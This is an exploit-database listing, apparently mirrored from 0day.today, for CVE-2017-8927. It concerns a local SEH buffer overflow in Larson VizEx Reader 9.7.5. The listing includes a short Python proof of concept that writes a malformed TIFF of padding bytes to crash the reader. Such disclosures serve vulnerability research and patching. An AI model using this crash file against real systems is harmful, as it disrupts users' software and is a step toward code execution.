Lucene search

K
zdtMuhann4d1337DAY-ID-27772
HistoryMay 15, 2017 - 12:00 a.m.

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH) Exploit

2017-05-1500:00:00
Muhann4d
0day.today
46

0.001 Low

EPSS

Percentile

48.2%

Exploit for windows platform in category dos / poc

#!/usr/bin/python
# Exploit Title     : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
# Date              : 14/05/2017
# Exploit Author    : Muhann4d
# CVE               : CVE-2017-8927
# Vendor Homepage   : http://www.cgmlarson.com/
# Software Link     : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html
# Affected Versions : 9.7.5   
# Category          : Denial of Service (DoS) Local
# Tested on OS      : Windows 7 Professional SP1 32bit
# Proof of Concept  : run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5
 
# Vendor has been cantacted but no reply
 
buf = "\x41" * 800
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()

#  0day.today [2018-02-15]  #

0.001 Low

EPSS

Percentile

48.2%

Related for 1337DAY-ID-27772